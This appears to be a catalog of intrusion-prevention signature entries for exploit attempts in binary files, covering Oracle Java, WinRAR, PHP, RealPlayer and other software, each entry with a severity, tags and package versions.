Description:
Back to top

File-Binary_Oracle-E-Business-Suite-Work-In-Process-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1706-5242
Vulnerability: Oracle-E-Business-Suite-Work-In-Process-SQL-Injection
Description:
Back to top

File-Binary_Oracle-Java-2d-Imaginglib-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Java Development Kit (JDK) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Oracle-Java-2d-Imaginglib-Integer-Overflow
Description:
Back to top

File-Binary_Oracle-Java-7-Applet-Remote-Code-Execution

About this situation: A vulnerability in Oracle Java Runtime Environment
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-472-5211
Last changed: sgpkg-ips-1821-5242
Vulnerability: Oracle-Java-7-Applet-Remote-Code-Execution
Description:
Back to top

File-Binary_Oracle-Java-Applet-Rhino-Script-Engine-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Oracle JDK and JRE detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-570-5211
Vulnerability: Oracle-Java-Applet-Rhino-Script-Engine-Policy-Bypass
Description:
Back to top

File-Binary_Oracle-Java-Awt_setpixels-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Oracle Java SE detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-589-5211
Last changed: sgpkg-ips-589-5211
Vulnerability: Oracle-Java-Awt_setpixels-Information-Disclosure
Description:
Back to top

File-Binary_Oracle-Java-Com.sun.org.glassfish.external.statistics.impl-Package-Sandbox-Breach

About this situation: An attempt to exploit a vulnerability in Oracle JDK and JRE detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle JDK, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1036-5242
Last changed: sgpkg-ips-1036-5242
Vulnerability: Oracle-Java-Statistics.impl-Package-Sandbox-Breach
Description:
Back to top

File-Binary_Oracle-Java-Filedialog.show-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Sun Microsystems Java Development Kit (JDK) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: Oracle-Java-Filedialog.show-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Oracle-Java-Final-Field-Overwrite

About this situation: An attempt to exploit a vulnerability in Oracle Java Development Kit (JDK) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Oracle-Java-Final-Field-Overwrite
Description:
Back to top

File-Binary_Oracle-Java-Font-Parsing-maxPoints-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-490-5211
Vulnerability: Oracle-Java-Font-Parsing-maxPoints-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Oracle-Java-Font-Parsing-Mort-Table-Ligature-Subtable-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Java Development Kit (JDK) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Oracle-Java-Font-Parsing-Mort-Table-Ligature-Subtable-Buffer-Overflow
Description:
Back to top

File-Binary_Oracle-Java-Java.awt.image.integercomponentraster-Memory-Corruption

About this situation: An attempt to exploit vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Oracle-Java-Java.awt.image.integercomponentraster-Memory-Corruption
Description:
Back to top

File-Binary_Oracle-Java-Jmx-Findclass-And-Elementfromcomplex-Sandbox-Breach

About this situation: An attempt to exploit a vulnerability in Oracle JRE detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Oracle-Java-Jmx-Findclass-And-Elementfromcomplex-Sandbox-Breach
Description:
Back to top

File-Binary_Oracle-Java-PhantomReference-Use-After-Free

About this situation: Suspicious traffic that might be an attempt to exploit a vulnerability in Oracle Java SE detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java SE, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-867-5242
Vulnerability: Oracle-Java-PhantomReference-Use-After-Free
Description:
Back to top

File-Binary_Oracle-Java-Private-Methodhandle-Sandbox-Bypass

About this situation: An attempt to exploit a vulnerability in Oracle Java Development Kit (JDK) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-562-5211
Vulnerability: Oracle-Java-Private-Methodhandle-Sandbox-Bypass
Description:
Back to top

File-Binary_Oracle-Java-Runtime-CMM-Readmabcurvedata-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle JRE detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: Oracle-Java-Runtime-CMM-Readmabcurvedata-Buffer-Overflow
Description:
Back to top

File-Binary_Oracle-Java-Runtime-Environment-Storeimagearray-Buffer-Overflow

About this situation: An attempt to exploit vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Oracle-Java-Runtime-Environment-Storeimagearray-Buffer-Overflow
Description:
Back to top

File-Binary_Oracle-Java-Runtime-True-Type-Font-Idef-Opcode-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Oracle-Java-Runtime-True-Type-Font-Idef-Opcode-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Oracle-Java-Sandbox-Breach

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Oracle-Java-Sandbox-Breach
Description:
Back to top

File-Binary_Oracle-Java-SE-Gsub-Reqfeatureindex-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Java Development Kit (JDK) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-563-5211
Vulnerability: Oracle-Java-SE-Gsub-Reqfeatureindex-Buffer-Overflow
Description:
Back to top

File-Binary_Oracle-Java-SE-Ligature-Substitution-Glyph-Storage-Out-Of-Bounds-Memory-Access

About this situation: An attempt to exploit a vulnerability in Oracle Java SE detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java SE, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: Oracle-Java-SE-Ligature-Substitution-Glyph-Storage-Out-Of-Bounds-Memory-Access
Description:
Back to top

File-Binary_Oracle-Java-SE-OCSP-Nextupdate-Replay-Attack

About this situation: An attempt to exploit a vulnerability in Oracle Java SE detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle JRockit, Oracle Java SE Embedded, Oracle Java SE, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-737-5211
Vulnerability: Oracle-Java-SE-OCSP-Nextupdate-Replay-Attack
Description:
Back to top

File-Binary_Oracle-Java-Security-Bybass-Vulnerability-CVE-2013-0422

About this situation: A vulnerability in Oracle Java Runtime Environment
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-504-5211
Vulnerability: Oracle-Java-Security-Bybass-Vulnerability-CVE-2013-0422
Description:
Back to top

File-Binary_Oracle-Java-Serviceloader-Exception-Handling-Sandbox-Bypass

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle JRockit, Oracle Java SE Embedded, Oracle Java Development Kit, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-581-5211
Vulnerability: Oracle-Java-Serviceloader-Exception-Handling-Sandbox-Bypass
Description:
Back to top

File-Binary_Oracle-Java-Soundbank-Resource-Name-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Java SE and Java for Business detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java SE, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: Oracle-Java-Soundbank-Resource-Name-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Oracle-Java-Sun.awt.image.imaginglib.lookupbytebi-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Oracle Java Development Kit (JDK) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Oracle-Java-Sun.awt.image.imaginglib.lookupbytebi-Memory-Corruption
Description:
Back to top

File-Binary_Oracle-Java-Sun.tracing.providerskeleton-Sandbox-Bypass

About this situation: An attempt to exploit a vulnerability in Oracle Java Development Kit (JDK) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-538-5211
Vulnerability: Oracle-Java-Sun.tracing.providerskeleton-Sandbox-Bypass
Description:
Back to top

File-Binary_Oracle-Java-System.arraycopy-Race-Condition

About this situation: An attempt to exploit a vulnerability in Oracle Java SE detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java SE Embedded, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-587-5211
Vulnerability: Oracle-Java-System.arraycopy-Race-Condition
Description:
Back to top

File-Binary_Oracle-Java-Xgetsampleptrfromsnd-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Oracle Java for Business detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Oracle-Java-Xgetsampleptrfromsnd-Memory-Corruption
Description:
Back to top

File-Binary_Oracle-Outside-In-CVE-2013-5791

About this situation: A suspicious binary file detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Binary_Oracle-Outside-In-Lotus-1-2-3-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, Avantstar Quick View Plus, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Oracle-Outside-In-Lotus-1-2-3-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-548-5211
Last changed: sgpkg-ips-548-5211
Vulnerability: Oracle-Outside-In-OS2-Metafile-Parser-Denial-Of-Service
Description:
Back to top

File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Oracle-Outside-In-OS22-Metafile-Parser-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, MS2013-02, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-563-5211
Vulnerability: Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow-2
Description:
Back to top

File-Binary_Oracle-Outside-In-Paradox-Database-Stream-Filter-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, MS2013-02, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-507-5211
Last changed: sgpkg-ips-507-5211
Vulnerability: Oracle-Outside-In-Paradox-Database-Stream-Filter-Denial-Of-Service
Description:
Back to top

File-Binary_Oracle-VirtualBox-Virtual-Disk-Image

About this situation: Oracle VirtualBox virtual disk image file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle VirtualBox, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Panda-AntiVirus-Zoo-Archive-Decompression-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Panda Software Antivirus detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Panda Software Antivirus, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-973-5242
Vulnerability: Panda-AntiVirus-Zoo-Archive-Decompression-Buffer-Overflow
Description:
Back to top

File-Binary_Path-Traversal-Via-Tar-Archive

About this situation: A suspicious TAR archive detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2006, CVE2019, CVE2021, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1605-5242
Vulnerability: Winace-Rar-And-Tar-Directory-Traversal-Vulnerability
Cisco-Prime-Infrastructure-And-Epnm-Uploadservlet-Tar-Directory-Traversal
Cisco-Prime-Infrastructure-TarArchive-Directory-Traversal
VMware-Vcenter-Server-Remote-Code-Execution-CVE-2021-21972
Pear-Archive-Tar-CVE-2021-32610-Symbolic-Link-Handling-Arbitrary-File-Write
VMware-Vrealize-Log-Insight-Directory-Traversal-Vulnerability-CVE-2022-31706
Description:
Back to top

File-Binary_Perl-Archive-Tar-Arbitrary-File-Overwrite

About this situation: An attempt to exploit a vulnerability in Perl Foundation Archive::Tar detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Perl, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1107-5242
Last changed: sgpkg-ips-1107-5242
Vulnerability: Perl-Archive-Tar-Arbitrary-File-Overwrite
Description:
Back to top

File-Binary_Php-EXIF-Extension-IFD_Make_Value-Thumbnail-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Php-EXIF-Extension-IFD_Make_Value-Thumbnail-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Php-Phar_Parse_Tarfile-Method-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Php-Phar_Parse_Tarfile-Method-Integer-Overflow
Description:
Back to top

File-Binary_PHP-Phar_Set_inode-Function-Archive-Processing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-662-5211
Last changed: sgpkg-ips-662-5211
Vulnerability: PHP-Phar_Set_inode-Function-Archive-Processing-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Php-Tar-File-Parsing-Uninitialized-Reference

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1260-5242
Vulnerability: Php-Tar-File-Parsing-Uninitialized-Reference
Description:
Back to top

File-Binary_Pidgin-MSN-MSNP2P-Message-Integer-Overflow

About this situation: Attempt to exploit an integer overflow vulnerability in Pidgin instant messaging client over HTTP detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Pidgin, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Pidgin-MSN-MSNP2P-Message-Integer-Overflow
Description:
Back to top

File-Binary_Possible-Cobalt-Strike-Beacon-Download

About this situation: Possible Cobalt Strike beacon was detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Vulnerability: Cobalt-Strike-Beacon-File
Description:
Back to top

File-Binary_Possible-Malware

About this situation: Possible Malware
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-432-4219
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_Qt-BMP-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Trolltech Qt Library
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trolltech Qt Library, CVE2004, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-789-5211
Vulnerability: Qt-BMP-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_Rar-File

About this situation: A RAR file was seen
Context: Other Binary File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, RARLAB WinRAR, Any Operating System not specific, Protocol Information, Archive
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_RARLAB-UnRAR-Extractunixlink50-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in RARLAB UnRAR detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, UnRAR, CVE2022, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1484-5242
Last changed: sgpkg-ips-1484-5242
Vulnerability: RARLAB-UnRAR-Extractunixlink50-Directory-Traversal
Description:
Back to top

File-Binary_RARLAB-WinRAR-ACE-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in RARLAB WinRAR detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RARLAB WinRAR, CVE2018, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1141-5242
Vulnerability: RARLAB-WinRAR-ACE-Directory-Traversal
Description:
Back to top

File-Binary_RARLAB-WinRAR-ACE-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in RARLAB WinRAR detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RARLAB WinRAR, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: RARLAB-WinRAR-ACE-Remote-Code-Execution
Description:
Back to top

File-Binary_RARLAB-WinRAR-Recovery-Volume-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in RARLAB WinRAR detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RARLAB WinRAR, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: RARLAB-WinRAR-Recovery-Volume-Out-Of-Bounds-Write
Description:
Back to top

File-Binary_Raw-Disk-Image

About this situation: Raw disk image file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-1007-5242
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_RealMedia-Video

About this situation: RealMedia Video download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, RealPlayer, Any Operating System not specific, Possibly Unwanted Content, Media File
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_RealNetworks-Internet-Video

About this situation: RealNetworks Internet Video download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, RealPlayer, Any Operating System not specific, Possibly Unwanted Content, Media File
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_RealNetworks-RealPlayer-Ivr-BOF

About this situation: An attempt to exploit a vulnerability in RealNetworks RealPlayer detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, RealPlayer, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: RealNetworks-RealPlayer-Ivr-Handling-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_RealNetworks-RealPlayer-Mp3-Files-Processing-Buffer-Overflow

About this situation: An attempt to exploit buffer overflow vulnerability in RealNetworks RealPlayer detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, RealPlayer Enterprise, RealOne Player, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: RealNetworks-RealPlayer-Mp3-Files-Processing-Buffer-Overflow
Description:
Back to top

File-Binary_RealPlayer-Malformed-RM-File-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in RealPlayer detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, RealPlayer, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: RealPlayer-Malformed-RM-File-Heap-Overflow
Description:
Back to top

File-Binary_RealPlayer-RealMedia-Security-Bypass

About this situation: An attempt to exploit a vulnerability in RealPlayer detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, RealPlayer, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-413-4219
Vulnerability: Binary_RealPlayer-RealMedia-Security-Bypass
Description:
Back to top

File-Binary_Realtek-Media-Player-Playlist-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Realtek Media Player.
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Realtek Media Player, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-761-5211
Vulnerability: Realtek-Media-Player-Playlist-Buffer-Overflow
Description:
Back to top

File-Binary_Red-Hat-Binary-Installation-Package

About this situation: Detected a download attempt of an executable content
Context: Other Binary File Stream
Severity: 2
Tags: SUSE Linux, Fedora Linux, Red Hat Linux, Mandrake Linux, Any Hardware, SUSE Linux not specific, Red Hat Linux not specific, Mandrake Linux not specific, Possibly Unwanted Content, Program File
